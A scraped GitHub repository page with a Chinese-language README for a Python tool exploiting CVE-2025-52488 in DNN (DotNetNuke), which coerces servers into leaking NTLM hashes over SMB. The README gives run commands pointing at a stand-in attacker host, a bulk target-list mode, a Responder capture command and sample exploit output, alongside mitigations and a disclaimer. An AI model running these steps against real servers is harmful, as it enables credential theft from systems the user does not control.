SystemVll/CVE-2025-52488

GitHub: SystemVll/CVE-2025-52488

针对 DNN 平台 CVE-2025-52488 漏洞的利用工具,通过 Unicode 路径规范化攻击诱导目标服务器泄露 NTLM 哈希。

Stars: 2 | Forks: 0

# DNN Unicode 路径规范化 NTLM 哈希泄露漏洞利用 (CVE-2025-52488) ## 概述 此漏洞利用针对 DNN(原名 DotNetNuke)6.0.0 到 10.0.1 之前版本中的一个漏洞,该漏洞允许攻击者通过 Unicode 路径规范化攻击泄露 NTLM 哈希。 ## 漏洞详情 - **CVE ID**: CVE-2025-52488 - **严重程度**: 高 (CVSS 8.6) - **受影响版本**: 6.0.0 到 10.0.1 之前 - **攻击媒介**: 网络 - **身份验证**: 无需 ## 工作原理 该漏洞利用滥用 Windows/.NET 的特性和 Unicode 规范化,迫使目标 DNN 服务器向攻击者控制的服务器发出 SMB 请求,从而可能在身份验证过程中暴露 NTLM 哈希。 ## 前置条件 1. Python 3.7+ 2. 必需的软件包(使用 `pip install -r requirements.txt` 安装) 3. 用于捕获 NTLM 哈希的 SMB 服务器(例如 Responder、Burp Collaborator) ## 用法 ### 基本用法 ``` python main.py targets.txt attacker.example.com ``` ### 使用自定义参数 ``` python main.py targets.txt 192.168.1.100 -t 20 --timeout 15 ``` ### 参数 - `targets`: 包含 DNN 主机列表的文件(每行一个) - `smb_server`: 用于捕获 NTLM 哈希的 SMB 服务器主机名/IP - `-t, --threads`: 并发线程数(默认:10) - `--timeout`: 请求超时时间(秒)(默认:10) ## 目标文件格式 创建一个包含目标 URL 的文本文件,每行一个: ``` http://target1.example.com https://target2.example.com:8080 target3.example.com ``` ## 设置 SMB 服务器 您可以使用 Responder 等工具来捕获 NTLM 哈希: ``` responder -I eth0 -wrf ``` 或者使用 Burp Collaborator 进行带外检测。 ## 示例输出 ``` [2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets [2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible [2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully [2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts ``` ## 检测指标 该漏洞利用会查找以下 DNN 指标: - `dnn_IsMobile` cookie - 响应中的 `dotnetnuke` - 响应中的 `dnnconnect` - 响应中的 `DNN Platform` ## 缓解措施 - 将 DNN 更新到 10.0.1 或更高版本 - 实施网络级控制,以防止向外部服务器发出 SMB 请求 - 监控可疑的文件上传尝试 ## 免责声明 此工具仅供教育和授权安全测试之用。请负责任地使用,并且仅在您拥有或获得明确测试许可的系统上使用。 ## 参考 - [CVE-2025-52488](https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-mgfv-2362-jq96) - [Assetnote 研究](https://slcyber.io/assetnote-security-research-center/abusing-windows-net-quirks-and-unicode-normalization-to-exploit-dnn-dotnetnuke/#hunting-variants)
标签:DotNetNuke, NTLM哈希窃取, Python, StruQ, 多人体追踪, 安全, 无后门, 超时处理, 逆向工具